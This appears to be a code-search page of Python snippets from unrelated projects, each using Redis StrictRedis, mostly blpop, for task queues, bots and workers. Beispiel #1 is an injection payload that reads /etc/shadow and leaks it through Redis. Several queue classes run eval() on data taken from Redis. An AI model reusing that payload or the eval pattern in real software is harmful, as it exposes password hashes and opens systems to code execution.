Beispiel #1
0
def main():
    code = """
from redis import StrictRedis
myr = StrictRedis()
with open("/etc/shadow") as fin:
    myr.rpush("{}", fin.read())
"""

    inject(code.format(OKEY))
    myr = StrictRedis()
    print myr.blpop(OKEY)[1]
Beispiel #2
0
def response_thread():
    """
    A thread that takes results from the client thread,
    then format a message and send it back to the user.
    """
    print("Response thread started")

    r2 = StrictRedis(host='localhost', port=6379)
    while True:
        item = r2.blpop('prediction')
        #         print(item[1])
        item = item[1].decode("utf-8")
        item = json.loads(item)
        chat_id = item['chat_id']
        predictions = item['predictions']

        # Prepare the response message to the user
        reply = ""
        for i, pred in enumerate(predictions):
            reply += "{}. {} ({:.4f})\n".format(i + 1, pred['label'],
                                                pred['proba'])

        # Send the message back to the user
        bot.sendMessage(chat_id, reply)
        print("Message sent to user")
Beispiel #3
0
class RedisQueue(object):
    def __init__(self, name, host='localhost', port=6379):
        # redis的默认参数为:host='localhost', port=6379, db=0, 其中db为定义redis database的数量
        self.db = StrictRedis(host=host, port=port, db=0, password=123456)
        self.key = name

    def size(self):
        return self.db.llen(self.key)  # 返回队列里面list内元素的数量

    def add(self, message):
        self.db.rpush(self.key, message)  # 添加新元素到队列最右方

    def pool_block(self, timeout=None):
        # 返回并移除队列第一个元素,如果为空则等待至有元素被加入队列(超时时间阈值为timeout,如果为None则一直等待)
        item = self.db.blpop(self.key, timeout=timeout)[1].decode()
        return item

    def pool(self):
        # 返回并移除队列的第一个的元素,如果队列为空返回的是None
        item = self.db.lpop(self.key).decode()
        return item

    def peek(self):
        # 返回队列的第一个元素,如果队列为空返回None
        item = self.db.lindex(self.key, 0).decode()
        return item
Beispiel #4
0
class RedisQueue(object):
    """Redis 任务队列"""
    def __init__(self,
                 host=REDIS_HOST,
                 port=REDIS_PORT,
                 password=REDIS_PASSWORD):
        self.db = StrictRedis(host=host, port=port, password=password)

    def put(self, request, redis_key):
        """
        将Request任务存入Redis中
        :param request
        :param redis_key
        :return bool        是否存成功
        """

        if isinstance(request, POIRequest):
            args = request.args2str()
            logging.info('New Task, params: %s' % args)
            return self.db.rpush(redis_key, args)

        return False

    def get(self, redis_key, timeout=None):
        """
        从Redis中获取Request任务
        :param redis_key
        :param timeout      等待时间
        :return POIRequest  Request
        """
        args = self.db.blpop(redis_key, timeout=timeout)[1]
        args = args.decode()

        logger.info('RedisQueue, new task, args:%s' % args)
        args = eval(args)

        return POIRequest(url=args['url'],
                          params=args['params'],
                          need_proxy=args['need_proxy'],
                          fail_time=args['fail_time'],
                          timeout=args['timeout'])

    def clear(self, redis_key):
        """
        清空任务队列
        :param redis_key
        """
        self.db.delete(redis_key)

    def empty(self, redis_key):
        """
        判断任务队列是否为空
        :param redis_key
        :return bool
        """
        return self.db.llen(redis_key) == 0
Beispiel #5
0
 def run(self):
     print("Starting " + self.name)
     r = StrictRedis(connection_pool=self.pool)
     while True:
         pd = json.loads(r.blpop('prediction')[1].decode("utf-8"))
         self.bot.send_message(
             pd["chat_id"],
             text='\n'.join(str(label) for label in pd["predictions"]))
         pd = {}
     print("Exiting " + self.name)
Beispiel #6
0
def how_redis():
    from redis import StrictRedis
    client = StrictRedis()
    key_list = ['key_' + str(i) for i in range(10)]
    client.delete(*key_list)
    client.zrem('name', *key_list)
    client.hdel('name', 'value', *key_list)
    client.lrem('name', count=0, value=10)
    client.zrange('name', 0, 0, withscores=True)
    client.zremrangebyrank()
    client.zincrby()
    client.zadd()
    client.zinterstore()
    client.mget()
    client.mset()
    pipe = client.pipeline()
    pipe.multi()
    client.zrevrangebyscore()
    client.blpop()
Beispiel #7
0
def run():
    redis = StrictRedis()
    nm = libnmo.Nexmo(API_KEY, API_SECRET)
    logger.info("started! ^_^")
    logger.info("  starting balance: %f" % (nm.balance))
    logger.info("  current send list size: %d" % (redis.llen(SEND_KEY)))
    logger.info("  current error list size: %d" % (redis.llen(ERROR_KEY)))
    logger.info("  current sent coldstore list size: %d" %
                (redis.llen(SENTCS_KEY)))

    while True:
        if redis.get("ncooldown"):
            sleep(30)
        else:
            j_msg = json.loads(redis.blpop(SEND_KEY)[1].decode("utf-8"))
            logger.info("processing new message (%s->%s)" %
                        (j_msg["from"], j_msg["to"]))
            logger.debug("  body: %s" % (j_msg["body"]))
            message = libnmo.NexmoMsg.new_text(
                j_msg["from"],
                j_msg["to"],
                j_msg["body"],
                client_ref=j_msg.get("app", None),
                status_report_req=j_msg.get("dlr", False),
                flash_message=j_msg.get("flash", False))
            logger.debug("  created message")
            responses = nm.send_msg(message)
            # scrub api key and secret from coldstore/error object
            logger.debug("  sent request to nexmo")
            del message["api_key"]
            del message["api_secret"]
            thing = {
                "at": datetime.utcnow().isoformat() + "UTC",
                "message": message,
                "responses": responses
            }

            if any(int(r["status"]) > 0 for r in responses):
                # bad times :<
                for r in responses:
                    if int(r["status"]) > 0:
                        logger.error("    sending message failed, %s" %
                                     (r["error-text"]))
                logger.info("  added message to error list (%s)" % (ERROR_KEY))
                redis.rpush(ERROR_KEY, json.dumps(thing))
                continue

            logger.info("  message sent (%d parts), current balance: %f" %
                        (len(responses), nm.balance))
            redis.rpush(SENTCS_KEY, json.dumps(thing))
            logger.info(
                "  saved message and responses to outbound coldstore list (%s)"
                % (SENTCS_KEY))
            logger.info("finished processing message")
Beispiel #8
0
def handle_updates(app_, redis_url):
    parsed = urllib.parse.urlparse(redis_url)
    redis_conn = StrictRedis(decode_responses=True,
                             host=parsed.hostname,
                             port=parsed.port)
    with app_.app_context():
        while True:
            _, msg = redis_conn.blpop('stand_updates')
            msg_json = json.loads(msg)
            job = Job.query.get(msg_json.get('id'))
            if logger.isEnabledFor(logging.DEBUG):
                logger.debug(msg)
Beispiel #9
0
class RedisCli(object):
    def __init__(self):
        self.conn = None

    def build_connection(self):
        workerconf = common.conf
        redisconf = dict()
        redisconf['host'] = workerconf["redis_host"]
        redisconf['password'] = workerconf['redis_pass']
        redisconf['port'] = workerconf['redis_port']
        self.conn = StrictRedis(**redisconf)

    def remove_task(self, task_id):
        # move task from running to finished
        self.conn.lrem("running", 1, task_id)
        self.conn.lpush("finished", task_id)

    def run_task(self, task_id):
        # move task from waiting to running
        # task is removed from waiting list by blpop
        self.conn.lpush("running", task_id)

    def recode_bug(self, score, base64_vulnerability):
        # add disclosed vulnerabilities into 'vulnerable' list
        self.conn.zadd("vulnerable", {base64_vulnerability: score})

    def get_request(self):
        _request_id = self.conn.blpop("waiting", 10)
        if _request_id and _request_id[0] == b"waiting":
            request_id = _request_id[1]
        else:
            return None
        result = self.retrieve_request(request_id)
        logger.success("Retrieve one request from 'waiting'.")
        return result

    def retrieve_request(self, request_id):
        _request = self.conn.hget("request", request_id)
        try:
            request = base64.b64decode(_request)
            request_decoded = request.decode("utf8", "ignore")
        except Exception as e:
            logger.error(
                "Error in decoding the request or getting the request : %s" %
                request_id)
            return None
        else:
            return [request_id, request_decoded]

    def delete_request(self, request_id):
        self.conn.hdel("request", request_id)
        return None
Beispiel #10
0
class RPCModule(Module):

	def __init__(self, **conf):
		# super(RPCModule, self).__init__()
		Module.__init__(self)
		self.lua_scripts = {}
		self.conf = conf
		self.alive = True
		self.topic = config.RPC_TOPIC
		self.db = None
		self.app = None

	def reconnect(self):
		u"""重连."""
		try:
			self.pool = ConnectionPool(socket_connect_timeout=3, **self.conf) 
			self.db = StrictRedis(connection_pool=self.pool, socket_timeout=1, socket_keepalive=60, socket_connect_timeout=1, **self.conf)
		except Exception:
			self.alive = False
			print(traceback.format_exc())

	def call(self, topic, f, callback, *args):
		u"""调用测试."""
		_data = json.dumps({
			"func": f,
			"ct": self.topic,
			"cb": callback,
			"args": args,
		})
		self.db.rpush(topic, _data)

	def Run(self):
		while self.closeSig == False:
			topic, data = self.db.blpop(self.topic)
			data = json.loads(data)
			f = data.get("func", None)
			if f:
				ret = self.app.dispatch(f, data["args"])
				cb = data.get("cb", None)
				ct = data.get("ct", None)
				if cb and ct:
					self.call(ct, cb, "", ret)
	
	def onInit(self, app, setting):
		u"""初始化."""
		Module.onInit(self, app, setting)
		self.reconnect()
Beispiel #11
0
def main(args=None):
    if args is None:
        args = sys.argv[1:]

    parser = argparse.ArgumentParser(description="Kinto Deployment Worker")
    parser.add_argument('--ini',
                        help='Application configuration file',
                        dest='ini_file')

    parsed_args = vars(parser.parse_args(args))
    logging.basicConfig(level=DEFAULT_LOG_LEVEL, format=DEFAULT_LOG_FORMAT)

    config_file = parsed_args['ini_file']
    env = bootstrap(config_file)
    registry = env['registry']

    r = StrictRedis(**registry.redis)

    while True:
        try:
            queue, b64_credentials = r.blpop(DEPLOY_QUEUE, 0)
        except KeyboardInterrupt:
            print("\rBye bye buddy")
            sys.exit(0)
        user_id = hmac_digest(registry.hmac_secret, b64_credentials)
        credentials = base64.b64decode(b64_credentials).split(':', 1)

        id_alwaysdata = r.get(ID_ALWAYSDATA_KEY.format(user_id))

        settings = {
            'id_alwaysdata': id_alwaysdata,
            'credentials': tuple(credentials),
            'postgresql_host': "postgresql-%s.alwaysdata.net" % id_alwaysdata,
            'ssh_host': "ssh-%s.alwaysdata.net" % id_alwaysdata,
            'ftp_host': "ftp-%s.alwaysdata.net" % id_alwaysdata,
            'prefixed_username': "******" % id_alwaysdata
        }

        status_handler = RedisStatusHandler(r, user_id)

        try:
            deploy_kinto_to_alwaysdata(status_handler, file_root=FILE_ROOT, **settings)
        except Exception as e:
            logger.error(e)
            # Retry later
            r.rpush(DEPLOY_QUEUE, b64_credentials)
Beispiel #12
0
def main():
    redis = StrictRedis(**config)
    fakeredis = FakeStrictRedis()
    redis.flushall()
    fakeredis.flushall()

    print '[+] FakeRedis BLPOP:'
    now = time()
    popped = fakeredis.blpop('hello_world', 10)
    print '[*] Took %.2f seconds' % (time() - now)
    print '[*] Popped value:', popped
    print

    print '[+] Redis BLPOP:'
    now = time()
    popped = redis.blpop('hello_world', 10)
    print '[*] Took %.2f seconds' % (time() - now)
    print '[*] Popped value:', popped
Beispiel #13
0
class CoreWorker(Thread):
    def __init__(self, host, port):
        super().__init__()
        self.interface = StrictRedis(host, port)

    def run(self):
        print("Starting CoreWorker")
        while True:
            reply = self.interface.blpop("samp.core")
            if len(reply) < 2:
                print("ERROR: reply length is", len(reply))

            message = reply[1].decode('utf-8')

            print("> '%s'" % message)

            if message == "exit":
                break
Beispiel #14
0
def main(queue_name):
    try:
        redis = StrictRedis(host=settings.REDIS_HOST,
                            charset="utf-8",
                            decode_responses=True)
    except Exception:
        print("Failed to connect")
        sys.exit(1)

    while True:
        print("waiting for message in queue \"{}\" ...".format(queue_name))
        _, msg = redis.blpop(queue_name)
        print("received message {}".format(msg))

        content = json.loads(msg)
        task_id = content.get('task_id')
        task_data = content.get('task_data')

        print("send task result to {}".format(task_id))
        redis.rpush(task_id, json.dumps({'task_result': task_data}))
Beispiel #15
0
class RedisQueue(BaseQueue):
    queue_type = 'redis'

    def __init__(self, config: dict) -> None:
        super().__init__(config)
        self.connection = StrictRedis(**self.config)

    def set_qname(self, qname: str) -> 'RedisQueue':
        self.qname = qname
        return self

    def put(self, payload: bytes) -> bool:
        return self._put(self.qname, payload)

    def _put(self, qname: str, payload: bytes) -> bool:
        pipe = self.connection.pipeline()
        try:
            pipe.watch(qname)
            pipe.multi()
            pipe.rpush(qname, payload)
            pipe.execute()
            return True
        except WatchError:
            LOGGER.error(f'watch error queue name: {qname}')
            return False

    def get(self, timeout: float = 3) -> str:
        return self._get(self.qname, timeout)

    def _get(self, qname: str, timeout: float = 3) -> str:
        msg = self.connection.blpop(
            self.qname,
            timeout=timeout,
        )
        if not msg:
            raise DequeueTimeout
        _, job_rk = msg
        return job_rk.decode()
def main(args=None):
    if args is None:
        args = sys.argv[1:]

    parser = argparse.ArgumentParser(description="Kinto Deployment Worker")
    parser.add_argument('--ini',
                        help='Application configuration file',
                        dest='ini_file')

    parsed_args = vars(parser.parse_args(args))
    logging.basicConfig(level=DEFAULT_LOG_LEVEL, format=DEFAULT_LOG_FORMAT)

    config_file = parsed_args['ini_file']
    env = bootstrap(config_file)
    registry = env['registry']

    r = StrictRedis(**registry.redis)

    while True:
        queue, b64_credentials = r.blpop(DEPLOY_QUEUE, 0)
        user_id = hmac_digest(registry.hmac_secret, b64_credentials)
        credentials = base64.b64decode(b64_credentials).split(':', 1)

        id_alwaysdata = r.get(ID_ALWAYSDATA_KEY.format(user_id))

        settings = {
            'id_alwaysdata': id_alwaysdata,
            'credentials': tuple(credentials),
            'postgresql_host': "postgresql-%s.alwaysdata.net" % id_alwaysdata,
            'ssh_host': "ssh-%s.alwaysdata.net" % id_alwaysdata,
            'ftp_host': "ftp-%s.alwaysdata.net" % id_alwaysdata,
            'prefixed_username': "******" % id_alwaysdata
        }

        status_handler = RedisStatusHandler(r, user_id)

        deploy_kinto_to_alwaysdata(status_handler, file_root=FILE_ROOT, **settings)
Beispiel #17
0
class RedisQueue(object):
    """Simple high level redis wrapper over lists."""
    def __init__(self, key=KEY):
        # create the key
        if not key:
            key = str(uuid.uuid4())
        self.key = key
        # and the redis connection
        self.rcon = StrictRedis()
        # clear the sentinels (None(s))
        self.rcon.lrem(self.key, 0, RedisQueue._serialize(None))

    @staticmethod
    def _serialize(item):
        # bad habit
        return repr(item)

    @staticmethod
    def _deserialize(item):
        # even worse
        try:
            return eval(item, GLOBS)
        except Exception as exc:
            return "<Invalid> - {}".format(exc)

    def push(self, item):
        """Insert an item in the queue."""
        # append a "serialized" item to the list (bad habit)
        self.rcon.rpush(self.key, RedisQueue._serialize(item))

    def pop(self, block=True):
        """Remove an item from the queue."""
        if block:  # wait until something is available
            item = self.rcon.blpop(self.key)[1]
        else:
            item = self.rcon.lpop(self.key)
        return RedisQueue._deserialize(item)
Beispiel #18
0
class RedisEngine(QueueEngine):
	"""docstring for RedisEngine"""
	def __init__(self):
		super(RedisEngine, self).__init__()
		self.r = None
		self.host = 'localhost'
		self.port = 6379

	def connect(self):
		self.r = StrictRedis(self.host, self.port, db=0)
		return self.is_available()

	def is_available(self):
		print('is redis available')
		if self.r is None:
			return False
		return self.r.ping() is not None

	def enqueue(self, queue, msg, timeout=0):
		self.r.rpush(queue, msg)

	def dequeue(self, queue, timeout):
		rsp = self.r.blpop(queue, timeout=0)
		return rsp[1]
Beispiel #19
0
class RedisEngine(QueueEngine):
    """docstring for RedisEngine"""
    def __init__(self):
        super(RedisEngine, self).__init__()
        self.r = None
        self.host = 'localhost'
        self.port = 6379

    def connect(self):
        self.r = StrictRedis(self.host, self.port, db=0)
        return self.is_available()

    def is_available(self):
        print('is redis available')
        if self.r is None:
            return False
        return self.r.ping() is not None

    def enqueue(self, queue, msg, timeout=0):
        self.r.rpush(queue, msg)

    def dequeue(self, queue, timeout):
        rsp = self.r.blpop(queue, timeout=0)
        return rsp[1]
Beispiel #20
0
class KartonBackend:
    def __init__(self, config):
        self.config = config
        self.redis = StrictRedis(
            host=config["redis"]["host"],
            port=int(config["redis"].get("port", 6379)),
            decode_responses=True,
        )
        self.minio = Minio(
            config["minio"]["address"],
            access_key=config["minio"]["access_key"],
            secret_key=config["minio"]["secret_key"],
            secure=bool(int(config["minio"].get("secure", True))),
        )

    @property
    def default_bucket_name(self) -> str:
        return self.config.minio_config["bucket"]

    @staticmethod
    def get_queue_name(identity: str, priority: TaskPriority) -> str:
        """
        Return Redis routed task queue name for given identity and priority

        :param identity: Karton service identity
        :param priority: Queue priority (TaskPriority enum value)
        :return: Queue name
        """
        return f"karton.queue.{priority.value}:{identity}"

    @staticmethod
    def get_queue_names(identity: str) -> List[str]:
        """
        Return all Redis routed task queue names for given identity,
        ordered by priority (descending). Used internally by Consumer.

        :param identity: Karton service identity
        :return: List of queue names
        """
        return [
            identity,  # Backwards compatibility (2.x.x)
            KartonBackend.get_queue_name(identity, TaskPriority.HIGH),
            KartonBackend.get_queue_name(identity, TaskPriority.NORMAL),
            KartonBackend.get_queue_name(identity, TaskPriority.LOW),
        ]

    @staticmethod
    def serialize_bind(bind: KartonBind) -> str:
        """
        Serialize KartonBind object (Karton service registration)

        :param bind: KartonBind object with bind definition
        :return: Serialized bind data
        """
        return json.dumps(
            {
                "info": bind.info,
                "version": bind.version,
                "filters": bind.filters,
                "persistent": bind.persistent,
            },
            sort_keys=True,
        )

    @staticmethod
    def unserialize_bind(identity: str, bind_data: str) -> KartonBind:
        """
        Deserialize KartonBind object for given identity.
        Compatible with Karton 2.x.x and 3.x.x

        :param identity: Karton service identity
        :param bind_data: Serialized bind data
        :return: KartonBind object with bind definition
        """
        bind = json.loads(bind_data)
        if isinstance(bind, list):
            # Backwards compatibility (v2.x.x)
            return KartonBind(
                identity=identity,
                info=None,
                version="2.x.x",
                persistent=not identity.endswith(".test"),
                filters=bind,
            )
        return KartonBind(
            identity=identity,
            info=bind["info"],
            version=bind["version"],
            persistent=bind["persistent"],
            filters=bind["filters"],
        )

    def get_bind(self, identity: str) -> KartonBind:
        """
        Get bind object for given identity

        :param identity: Karton service identity
        :return: KartonBind object
        """
        return self.unserialize_bind(
            identity, self.redis.hget(KARTON_BINDS_HSET, identity))

    def get_binds(self) -> List[KartonBind]:
        """
        Get all binds registered in Redis

        :return: List of KartonBind objects for subsequent identities
        """
        return [
            self.unserialize_bind(identity, raw_bind) for identity, raw_bind in
            self.redis.hgetall(KARTON_BINDS_HSET).items()
        ]

    def register_bind(self, bind: KartonBind) -> Optional[KartonBind]:
        """
        Register bind for Karton service and return the old one

        :param bind: KartonBind object with bind definition
        :return: Old KartonBind that was registered under this identity
        """
        with self.redis.pipeline(transaction=True) as pipe:
            pipe.hget(KARTON_BINDS_HSET, bind.identity)
            pipe.hset(KARTON_BINDS_HSET, bind.identity,
                      self.serialize_bind(bind))
            old_serialized_bind, _ = pipe.execute()

        if old_serialized_bind:
            return self.unserialize_bind(bind.identity, old_serialized_bind)
        else:
            return None

    def unregister_bind(self, identity: str) -> None:
        """
        Removes bind for identity
        :param bind: Identity to be unregistered
        """
        self.redis.hdel(KARTON_BINDS_HSET, identity)

    def set_consumer_identity(self, identity: str) -> None:
        """
        Sets identity for current Redis connection
        """
        return self.redis.client_setname(identity)

    def get_online_consumers(self) -> Dict[str, List[str]]:
        """
        Gets all online consumer identities

        :return: Dictionary {identity: [list of clients]}
        """
        bound_identities = defaultdict(list)
        for client in self.redis.client_list():
            bound_identities[client["name"]].append(client)
        return bound_identities

    def get_task(self, task_uid: str) -> Optional[Task]:
        """
        Get task object with given identifier

        :param task_uid: Task identifier
        :return: Task object
        """
        task_data = self.redis.get(f"{KARTON_TASK_NAMESPACE}:{task_uid}")
        if not task_data:
            return None
        return Task.unserialize(task_data, backend=self)

    def get_tasks(self, task_uid_list: List[str]) -> List[Task]:
        """
        Get multiple tasks for given identifier list

        :param task_uid_list: List of task identifiers
        :return: List of task objects
        """
        task_list = self.redis.mget([
            f"{KARTON_TASK_NAMESPACE}:{task_uid}" for task_uid in task_uid_list
        ])
        return [
            Task.unserialize(task_data, backend=self)
            for task_data in task_list if task_data is not None
        ]

    def get_all_tasks(self) -> List[Task]:
        """
        Get all tasks registered in Redis

        :return: List with Task objects
        """
        tasks = self.redis.keys(f"{KARTON_TASK_NAMESPACE}:*")
        return [
            Task.unserialize(task_data) for task_data in self.redis.mget(tasks)
            if task_data is not None
        ]

    def register_task(self, task: Task) -> None:
        """
        Register task in Redis.

        Consumer should register only Declared tasks.
        Status change should be done using set_task_status.

        :param task: Task object
        """
        self.redis.set(f"{KARTON_TASK_NAMESPACE}:{task.uid}", task.serialize())

    def set_task_status(self,
                        task: Task,
                        status: TaskState,
                        consumer: Optional[str] = None) -> None:
        """
        Request task status change to be applied by karton-system

        :param task: Task object
        :param status: New task status (TaskState)
        :param consumer: Consumer identity
        """
        self.redis.rpush(
            KARTON_OPERATIONS_QUEUE,
            json.dumps({
                "status": status.value,
                "identity": consumer,
                "task": task.serialize(),
                "type": "operation",
            }),
        )

    def delete_task(self, task: Task) -> None:
        """
        Remove task from Redis

        :param task: Task object
        """
        self.redis.delete(f"{KARTON_TASK_NAMESPACE}:{task.uid}")

    def get_task_queue(self, queue: str) -> List[Task]:
        """
        Return all tasks in provided queue

        :param queue: Queue name
        :return: List with Task objects contained in queue
        """
        task_uids = self.redis.lrange(queue, 0, -1)
        return self.get_tasks(task_uids)

    def get_task_ids_from_queue(self, queue: str) -> List[str]:
        """
        Return all task UIDs in a queue

        :param queue: Queue name
        :return: List with task identifiers contained in queue
        """
        return self.redis.lrange(queue, 0, -1)

    def remove_task_queue(self, queue: str) -> List[Task]:
        """
        Remove task queue with all contained tasks

        :param queue: Queue name
        :return: List with Task objects contained in queue
        """
        pipe = self.redis.pipeline()
        pipe.lrange(queue, 0, -1)
        pipe.delete(queue)
        return self.get_tasks(pipe.execute()[0])

    def produce_unrouted_task(self, task: Task) -> None:
        """
        Add given task to unrouted task (``karton.tasks``) queue

        Task must be registered before with :py:meth:`register_task`

        :param task: Task object
        """
        self.redis.rpush(KARTON_TASKS_QUEUE, task.uid)

    def produce_routed_task(self, identity: str, task: Task) -> None:
        """
        Add given task to routed task queue of given identity

        Task must be registered using :py:meth:`register_task`

        :param identity: Karton service identity
        :param task: Task object
        """
        self.redis.rpush(self.get_queue_name(identity, task.priority),
                         task.uid)

    def consume_queues(self,
                       queues: Union[str, List[str]],
                       timeout: int = 0) -> Optional[Tuple[str, str]]:
        """
        Get item from queues (ordered from the most to the least prioritized)
        If there are no items, wait until one appear.

        :param queues: Redis queue name or list of names
        :param timeout: Waiting for item timeout (default: 0 = wait forever)
        :return: Tuple of [queue_name, item] objects or None if timeout has been reached
        """
        return self.redis.blpop(queues, timeout=timeout)

    def consume_routed_task(self,
                            identity: str,
                            timeout: int = 5) -> Optional[Task]:
        """
        Get routed task for given consumer identity.

        If there are no tasks, blocks until new one appears or timeout is reached.

        :param identity: Karton service identity
        :param timeout: Waiting for task timeout (default: 5)
        :return: Task object
        """
        item = self.consume_queues(
            self.get_queue_names(identity),
            timeout=timeout,
        )
        if not item:
            return None
        queue, data = item
        return self.get_task(data)

    @staticmethod
    def _log_channel(logger_name: Optional[str], level: Optional[str]) -> str:
        return ".".join(
            [KARTON_LOG_CHANNEL, (level or "*").lower(), logger_name or "*"])

    def produce_log(
        self,
        log_record: Dict[str, Any],
        logger_name: str,
        level: str,
    ) -> bool:
        """
        Push new log record to the logs channel

        :param log_record: Dict with log record
        :param logger_name: Logger name
        :param level: Log level
        :return: True if any active log consumer received log record
        """
        return (self.redis.publish(self._log_channel(logger_name, level),
                                   json.dumps(log_record)) > 0)

    def consume_log(
        self,
        timeout: int = 5,
        logger_filter: Optional[str] = None,
        level: Optional[str] = None,
    ) -> Iterator[Optional[Dict[str, Any]]]:
        """
        Subscribe to logs channel and yield subsequent log records
        or None if timeout has been reached.

        If you want to subscribe only to a specific logger name
        and/or log level, pass them via logger_filter and level arguments.

        :param timeout: Waiting for log record timeout (default: 5)
        :param logger_filter: Filter for name of consumed logger
        :param level: Log level
        :return: Dict with log record
        """
        with self.redis.pubsub() as pubsub:
            pubsub.psubscribe(self._log_channel(logger_filter, level))
            while pubsub.subscribed:
                item = pubsub.get_message(ignore_subscribe_messages=True,
                                          timeout=timeout)
                if item and item["type"] == "pmessage":
                    body = json.loads(item["data"])
                    if "task" in body and isinstance(body["task"], str):
                        body["task"] = json.loads(body["task"])
                    yield body
                yield None

    def increment_metrics(self, metric: KartonMetrics, identity: str) -> None:
        """
        Increments metrics for given operation type and identity

        :param metric: Operation metric type
        :param identity: Related Karton service identity
        """
        self.redis.hincrby(metric.value, identity, 1)

    def upload_object(
        self,
        bucket: str,
        object_uid: str,
        content: Union[bytes, BinaryIO],
        length: int = None,
    ) -> None:
        """
        Upload resource object to underlying object storage (Minio)

        :param bucket: Bucket name
        :param object_uid: Object identifier
        :param content: Object content as bytes or file-like stream
        :param length: Object content length (if file-like object provided)
        """
        if isinstance(content, bytes):
            length = len(content)
            content = BytesIO(content)
        self.minio.put_object(bucket, object_uid, content, length)

    def upload_object_from_file(self, bucket: str, object_uid: str,
                                path: str) -> None:
        """
        Upload resource object file to underlying object storage

        :param bucket: Bucket name
        :param object_uid: Object identifier
        :param path: Path to the object content
        """
        self.minio.fput_object(bucket, object_uid, path)

    def get_object(self, bucket: str, object_uid: str) -> HTTPResponse:
        """
        Get resource object stream with the content.

        Returned response should be closed after use to release network resources.
        To reuse the connection, it's required to call `response.release_conn()`
        explicitly.

        :param bucket: Bucket name
        :param object_uid: Object identifier
        :return: Response object with content
        """
        return self.minio.get_object(bucket, object_uid)

    def download_object(self, bucket: str, object_uid: str) -> bytes:
        """
        Download resource object from object storage.

        :param bucket: Bucket name
        :param object_uid: Object identifier
        :return: Content bytes
        """
        reader = self.minio.get_object(bucket, object_uid)
        try:
            return reader.read()
        finally:
            reader.release_conn()
            reader.close()

    def download_object_to_file(self, bucket: str, object_uid: str,
                                path: str) -> None:
        """
        Download resource object from object storage to file

        :param bucket: Bucket name
        :param object_uid: Object identifier
        :param path: Target file path
        """
        self.minio.fget_object(bucket, object_uid, path)

    def list_objects(self, bucket: str) -> List[str]:
        """
        List identifiers of stored resource objects

        :param bucket: Bucket name
        :return: List of object identifiers
        """
        return [
            object.object_name for object in self.minio.list_objects(bucket)
        ]

    def remove_object(self, bucket: str, object_uid: str) -> None:
        """
        Remove resource object from object storage

        :param bucket: Bucket name
        :param object_uid: Object identifier
        """
        self.minio.remove_object(bucket, object_uid)

    def check_bucket_exists(self, bucket: str, create: bool = False) -> bool:
        """
        Check if bucket exists and optionally create it if it doesn't.

        :param bucket: Bucket name
        :param create: Create bucket if doesn't exist
        :return: True if bucket exists yet
        """
        if self.minio.bucket_exists(bucket):
            return True
        if create:
            self.minio.make_bucket(bucket)
        return False
import base64
from io import BytesIO

import requests
from redis import StrictRedis
import json
from PIL import Image


if __name__ == '__main__':
    queue = StrictRedis(host='localhost', port=6379)
    while True:
        data = queue.blpop("download")
        json_dict = data[1].decode('utf-8')
        data_dict = json.loads(json_dict)
        URL = data_dict['url']
        timestamp = data_dict['timestamp']

        ##Download image from url
        image_data = requests.get(URL).content
        file_name = timestamp + ".png"
        with open(file_name, 'wb') as outfile:
            outfile.write(image_data)

        ##Encode the image with base64
        image = Image.open(file_name)
        buffered = BytesIO()
        image.save(buffered, format="PNG")
        encoded_img = base64.b64encode(buffered.getvalue())
        encoded_img_str = encoded_img.decode('utf-8')
import json
import struct

import redis
from redis import StrictRedis

r = StrictRedis(host='localhost', port=6379)
ENCODING = 'utf-8'
data = {}

def encodeImg(content):
    encoded_image = base64.b64encode(content)
    return encoded_image

while True:
    download = json.loads(r.blpop('download')[1].decode("utf-8"))
    print(download)
    try:
        if download["url"] != "":
            response = requests.get(download["url"])
            send_image = response.content
            encoded_image = encodeImg(send_image)

            base64_string = encoded_image.decode(ENCODING)
    except Exception as e:
        print(e)
    try:
        if download["img_id"] != "":
            base64_string = download["img_id"]
    except Exception as e:
        print(e)
Beispiel #23
0
class Zone(object):
    def __init__(self):
        self.id = None
        self.world_path = ''
        self.entities = {}
        self.components = {}
        self.renderer_class = DefaultRenderer
        self.entities_by_component_name = {}
        self.ticking_entities = set()
        self.tick_interval = 1
        self.running = False
        self.redis = None
        self._max_id = 0

    @classmethod
    def from_config(cls, id, world_path):
        self = cls()

        self.id = id
        self.world_path = world_path

        self.load_config()

        return self

    @property
    def tick_key(self):
        return 'zone:%s:tick' % self.id

    @property
    def incoming_key(self):
        return 'zone:%s:incoming' % self.id

    @staticmethod
    def messages_key(entity_id):
        return 'entity:%s:messages' % entity_id

    def next_id(self):
        self._max_id += 1
        return self._max_id

    def load_config(self):
        base_path = os.path.abspath(os.path.expanduser(self.world_path))

        config = None

        for serializer in SERIALIZERS.values():
            config_filename = 'config.%s' % serializer.extension
            config_path = os.path.join(base_path, config_filename)

            try:
                with open(config_path) as f:
                    config = serializer.unserialize(f.read())
            except EnvironmentError:
                continue
            except Exception as e:  # TODO: UnserializeError
                fatal('Error while reading %s: %s' % (config_path, e))

        if config is None:
            fatal('Unable to read config.{%s} from %s' % (
                ','.join(s.extension for s in SERIALIZERS.values()), base_path
            ))

        if self.id not in config['zones']:
            fatal("Undefined zone '%s'" % self.id)

        tick_interval = config['zones'][self.id].get('tick', 1)
        self.tick_interval = tick_interval

        # TODO: per-zone persistence settings

        persistence = config.get('persistence')
        if not persistence:
            fatal('Unspecified persistence settings')

        # TODO: alternate persistence modes

        if not persistence['mode'] == 'snapshot':
            fatal("Unrecognized persistence mode '%s'" % persistence['mode'])

        self.config = config

        self.redis = StrictRedis(
            config['redis']['host'],
            config['redis']['port'],
        )

        renderer_name = self.config['world'].get('renderer')
        if renderer_name:
            renderer_module_name, _, renderer_class_name = renderer_name.rpartition('.')
            renderer_module = importlib.import_module(renderer_module_name)
            self.renderer_class = getattr(renderer_module, renderer_class_name)

    @property
    def snapshot_path(self):
        snapshot_path = self.config['persistence']['file']
        try:
            snapshot_path = snapshot_path.format(id=self.id)
        except TypeError:
            pass
        return os.path.join(
            self.world_path,
            os.path.expanduser(snapshot_path)
        )

    @property
    def snapshot_serializer(self):
        extension = self.config['persistence'].get('format')
        if not extension:
            extension = os.path.splitext(self.snapshot_path)[1][1:]
        return SERIALIZERS[extension]

    def load_snapshot(self):
        if not os.path.exists(self.snapshot_path):
            return False

        log.info('Loading snapshot: %s' % self.snapshot_path)
        with open(self.snapshot_path, 'r') as f:
            snapshot = f.read()
            # if self.config['persistence'].get('compressed'):
            #     snapshot = zlib.decompress(snapshot)
            snapshot = self.snapshot_serializer.unserialize(snapshot)

            log.info('Creating entities...')

            for entity_dict in snapshot['entities']:
                entity = Entity.from_dict({
                    'id': entity_dict['id'],
                    'hearing': entity_dict['hearing'],
                }, self)
                self._max_id = max(self._max_id, entity.id)

